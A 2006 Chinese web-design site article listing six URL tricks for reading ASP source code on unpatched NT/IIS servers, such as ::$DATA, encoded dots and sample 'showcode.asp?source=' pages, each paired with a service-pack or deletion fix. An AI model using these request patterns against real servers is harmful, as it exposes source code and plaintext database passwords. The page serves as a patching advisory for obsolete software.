添加收藏
 系统管理
 联系方式
首页 文学作品 网页设计 平面设计 程序设计 考试认证 基础办公 QQ资源 服务器架设 网站运营 网页资源
  汉南在线网页设计Asp动态程序

偷看ASP原码的6种方法
作  者:汉南居士
关键字:ASP技术应用



在没有打Services Pack6补丁的NT server上,至少有6种方法可以看到ASP程序的源代码,它们是:

1、http://www.someserver.com/msadc/Samples/SELECTOR/showcode.asp?source=/msadc/Samples/SELECTOR/showcode.asp
解决方案:删除showcode.asp

2、http://somewhere/something.asp::$DATA
解决方案: 装sp3

3、http://somewhere/something.asp%2e
解决方案: 装sp4

or http://somewhere/something.asp.(加一个点)
解决方案: 装sp4

4、http://somewhere/something%2e%41sp
或者 http://somewhere/something%2e%asp
解决方案: 装sp4

5、http://somewhere/something.asp%81
解决方案:装sp6或者打补丁

6、http://somewhere/iissamples/exair/howitworks/code.asp?source=xxx.asp

最大的危害莫过于asp文件可以被上述方式读出;数据库密码以明文形式暴露在黑客眼前;


来源:互联网
阅读:336
日期:2006-10-26

【 双击滚屏 】 【 推荐朋友 】 【 收藏 】 【 打印 】 【 关闭 】 【 字体: 】 
上一篇:远程调用ACCESS数据库的源代码
下一篇:[原创]一段用ASP查看ASP文件源码的程序

  >> 相关文章
 
  ·asp中怎么把access中指字的字段值全部加起来
  ·利用XML将ASP生成HTML页面
  ·asp与单选按钮
  ·ASP的Form集合
  ·用ASP判断文件地址是否有效
  ·ASP怎么判断网站上是否存在一个文件
  ·ASP+FSO+框架实现ASP生成htm并分页的方法(批量)
  ·创建一个ASP通用分页类

5.12汶川大地震遇难同胞默哀 | 汉南在线总站 | 网站建设 | BT电影下载 | 汉南在线博客 | 流行购商城
授权使用:汉南在线 http://hnzx.hzwz.net/
经营许可证:陕ICP备05000109号 Powered by:汉南在线  
Copyright (c) 2002-2008 汉南在线. All Rights Reserved .